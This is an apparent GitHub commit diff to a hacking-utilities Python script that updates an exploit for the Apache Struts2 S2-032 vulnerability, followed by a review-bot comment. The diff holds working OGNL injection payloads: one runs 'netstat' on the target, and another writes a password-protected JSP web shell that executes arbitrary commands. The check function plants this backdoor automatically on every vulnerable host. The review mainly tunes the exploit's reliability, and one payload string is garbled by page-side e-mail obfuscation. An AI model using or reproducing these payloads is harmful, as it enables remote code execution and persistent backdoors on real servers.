
Commit 8822c37

author
avfisher
committed
update exp for s2-032
1 parent 430b6cb commit 8822c37


1 file changed

+11
-6
lines changed


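--- a/hackUtils.py
+++ b/hackUtils.py
@@ -753,23 +753,28 @@ def rceStruts2S2032(value):
 
 def checkS2032(url):
     url = url.strip()
+    if '?' in url:
+        url = url.split('?')[0]
     #reg = 'http[s]*://.*/$'
     #m = re.match(reg,url)
     #if not m:
     #    url = url + "/"
+
+    poc = url+"?method:%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%23parameters.command[0]%29.getInputStream%28%29%2c%23b%3dnew%20java.io.InputStreamReader%28%23a%29%2c%23c%3dnew%20java.io.BufferedReader%28%23b%29%2c%23d%3dnew%20char[51020]%2c%23c.read%28%23d%29%2c%23kxlzx%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%29%2c%23kxlzx.close&command=netstat"
+
     shellname="nimabi.jsp"
     shellpwd="pwd"
     exp = url+"?method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj="+shellname+"&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22"+shellpwd+"%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E"
     try:
-        result = exploitS2032(exp)
-        if shellname in result:
-            document_root = result.strip()
+        result = exploitS2032(poc)
+        if "Local Address" in result:
+            shell_path = exploitS2032(exp).strip()
             reg = '(http[s]*://[^/]*/?).*$'
             m = re.search(reg,url)
             if m:
-                url=m.group(1)
-                shell_file = url+shellname
-                vuls='[+] vuls found! url: '+url+', document_root: '+document_root+', shell_file: '+shell_file
+                url_path=m.group(1)
+                shell_file = url_path+shellname
+                vuls='[+] vuls found! url: '+url+', shell_path: '+ shell_path +', shell_file: '+shell_file
                 logfile(vuls,'s2032_rce.txt')
                 print vuls
         else: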
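Review bot: The new `shell_path = exploitS2032(exp).strip()` line drops the old `if shellname in result:` guard, so nothing verifies that the JSP was actually written — an error page or empty body from the upload request is logged verbatim as `shell_path` in a `[+] vuls found!` line; keep the guard, e.g. `shell_path = exploitS2032(exp).strip()` followed by `if shellname not in shell_path:` falling through to the not-found branch. The `"Local Address" in result` probe is also fragile: it assumes `netstat` exists on the target and prints English column headers, so a non-English locale or a minimal container yields a false negative, whereas a command that echoes a random per-run token and is compared back is locale-independent. A function named `check` additionally drops a JSP backdoor with a fixed password (`"024"` via the `pwd` parameter) and fixed filename as a side effect of a positive probe, leaving every scanned host open to anyone who reads this tool; at minimum generate `shellname`/`shellpwd` per run, or move the upload out of the check into a separate exploit step. Whether `reg`/`if m:` sit inside the `"Local Address"` branch cannot be read from the rendered page; if they do not, `shell_path` is unbound whenever the probe fails, and the `%[email protected]@` fragment in `exp` looks like page-side e-mail obfuscation of `%3d@ognl.OgnlContext@` and should be confirmed against the repository. checkS2032 continues past the hunk (the `else:` body and the `except` for the `try` are outside).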
